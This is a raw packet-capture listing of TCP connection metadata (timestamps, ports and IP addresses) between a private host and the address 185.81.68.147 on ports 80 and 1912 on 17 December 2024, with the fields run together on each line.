                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.792622089 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.792748928 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.877187967 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.877230883 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.877350092 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.878662109 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.878817081 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.881076097 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.881192923 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.881191969 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.884237051 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.884342909 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.884391069 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.884392023 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.887237072 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.887401104 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.890028000 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.890275002 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.890305996 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.893193960 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.893280029 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.893313885 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.893611908 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.896053076 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.896104097 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.897994995 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.898839951 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.898946047 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.901103973 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.901632071 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.901741982 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.904612064 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.904644012 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.904778004 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.904778004 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.907133102 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.907231092 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.907316923 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.909864902 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.909970045 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.910029888 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.912465096 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.912575006 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.912642002 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.914995909 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.915194988 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.917601109 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.917613983 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.917749882 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.919981956 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.920113087 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.920341969 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.922430992 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.922554016 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.922651052 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.924916983 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.924984932 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.926042080 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.927318096 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.927478075 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.928092003 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.929919004 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.930079937 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.932214022 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.932316065 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.932356119 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.932356119 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.934653044 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.934756041 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.934803963 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.937155962 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.937201977 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.938947916 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.939706087 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.939744949 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.941559076 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.942085981 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.942107916 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.944456100 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.944513083 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.944554090 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.944628000 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.946933985 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.947104931 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.947149038 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.949366093 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.949489117 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.949548960 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.951812983 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.951833963 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.951963902 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.954951048 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.955060959 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.955182076 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.956931114 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.957025051 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.957329988 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.959140062 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.959276915 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.960186958 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.961632013 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.961752892 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.964056969 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.964186907 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.964236021 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.964236021 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.966511965 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.966600895 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.968401909 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.968935966 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.969033957 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.971457005 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.971518993 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.971656084 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.971719027 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.973858118 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.973943949 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.975991964 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.976298094 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.976412058 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.977771997 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.978724003 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.978826046 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.980077028 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.981184959 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.981287003 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.981431961 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.983643055 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.983745098 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.983947039 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.986325979 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.986464977 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.986577988 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.988517046 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.988574028 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.988645077 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.991044998 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.991136074 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.992173910 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.993431091 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.993624926 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.995837927 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.995889902 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.995980024 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.996036053 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.998296976 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.998368979 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.998447895 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.000798941 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.000821114 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.000874996 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.003247023 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.003289938 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.004057884 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.005713940 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.005904913 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.008106947 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.008189917 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.008193016 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.008388996 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.010512114 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.010584116 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.010664940 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.069262028 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.069380045 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.069439888 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.070171118 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.070641041 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.070732117 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.070795059 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.072565079 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.072621107 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.072654963 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.074568033 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.074632883 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.074639082 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.074687958 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.074807882 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.196033955 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.214409113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.335779905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.335921049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.335921049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.455713034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.209059000 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.328949928 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.329134941 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.339333057 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.459204912 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677186012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677208900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677226067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677237988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677249908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677261114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677280903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677280903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677355051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677360058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677381039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677393913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677428961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677428961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.797489882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.797543049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.797688961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.869210958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.869296074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.869438887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.873414040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.873527050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.873675108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.881839037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.881948948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.882066011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.890239954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.890346050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.890477896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.898657084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.898760080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.898977995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.907030106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.907126904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.907305002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.915421963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.915545940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.915654898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.923836946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.923909903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.924072981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.932169914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.932270050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.932442904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.940629005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.940671921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.940920115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.950143099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.950155973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.950335026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.061538935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.061611891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.061738968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.063834906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.063896894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.064060926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.072340012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.072385073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.072531939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.080703974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.080744028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.080904961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.085716963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.085819960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.085952044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.090547085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.090641975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.090784073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.095545053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.095685005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.095813990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.100462914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.100621939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.100912094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.105319977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.105401993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.105696917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.114356041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.114485025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.114649057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.117212057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.117357016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.117954016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.122029066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.122176886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.122617006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.127152920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.127166986 CET8049709185.81.68.147192.168.2.8
